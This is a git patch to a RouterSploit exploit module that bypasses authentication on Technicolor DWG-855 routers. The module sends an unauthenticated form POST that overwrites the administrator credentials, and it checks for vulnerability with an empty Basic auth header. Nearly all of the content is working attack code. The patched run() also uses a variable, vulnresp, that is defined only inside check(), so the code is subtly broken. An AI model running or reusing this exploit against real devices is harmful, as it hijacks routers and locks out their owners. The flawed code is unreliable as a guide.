From 2d2b24c224a4a8d877eb94821f97ec347cea544a Mon Sep 17 00:00:00 2001
From: 0BuRner <0BuRner@users.noreply.github.com>
Date: Sun, 13 Nov 2016 17:45:00 +0100
Subject: [PATCH] Update dwg855_authbypass.py

---
 routersploit/modules/exploits/technicolor/dwg855_authbypass.py | 44 +++++++++++++++++++++++++++++---------------
 1 file changed, 29 insertions(+), 15 deletions(-)

diff --git a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
index a3759e5..019bdc8 100644
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
@@ -1,14 +1,15 @@
-import base64
+import binascii
 
-from routersploit import(
+from routersploit import (
     exploits,
     print_success,
     print_error,
+    print_status,
     sanitize_url,
     http_request,
-    mute
 )
 
+
 class Exploit(exploits.Exploit):
     """
     Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
@@ -16,10 +17,10 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
-        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.\nNOTE2: run \"check\" after runing module to see if it worked.',
-        'authors': [
-            'JPaulMora',  # vulnerability discovery
-            'JPaulMora <https://JPaulMora.GitHub.io>',  # routersploit module
+        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
+        'author': [
+            'JPaulMora <https://JPaulMora.GitHub.io>',
+            # vulnerability discovery,routersploit module
         ],
         'references': [
             'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit):
     npass = exploits.Option('rpass', 'Overwrite old password with.. ')
 
     def run(self):
+        print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
         url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
         headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = {"HttpUserId":self.nuser, "Password":self.npass, "PasswordReEnter":self.npass, "RestoreFactoryNo":"0x00"}
+        data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
 
         response = http_request(method="POST", url=url, headers=headers, data=data)
-        return ""
 
-    @mute
+        if response is None:
+            print_error("Target didn't answer request.")
+        elif vulnresp in response.text.encode('utf-8'):
+            print_success("Credentials changed!")
+        elif response.status_code == 401:
+            print_error("Target answered, denied access.")
+        else:
+            print_error("Unknown error, submit an issue.")
+
     def check(self):
-        url = sanitize_url("{}:{}/RgConnect.asp".format(self.target, self.port))
+
+        # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
+        vulnresp = binascii.unhexlify('114475636b7900')  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
+
+        url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
         user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
-        authorization = 'Basic {}'.format(base64.b64encode(self.nuser + ':' + self.npass))
         headers = {'User-Agent': user_agent,
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                    'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
                    'Connection': 'keep-alive',
                    'Accept-Encoding': 'gzip, deflate',
-                   'Authorization': authorization,
+                   'Authorization': 'Og==',  # this is base64(":")
                    'Cache-Control': 'no-cache',
                    'Connection': 'close'}
 
@@ -60,7 +72,9 @@ class Exploit(exploits.Exploit):
 
         if response is None:
             return False  # target is not vulnerable
-        if response.status_code == 401:
+        elif vulnresp in response.text.encode('utf-8'):
+            return True  # device is vulnerable
+        elif response.status_code == 401:
             return False  # target is not vulnerable
         else:
-            return True  # device is vulnerable
+            return False  # target is not vulnerable
--
libgit2 0.26.0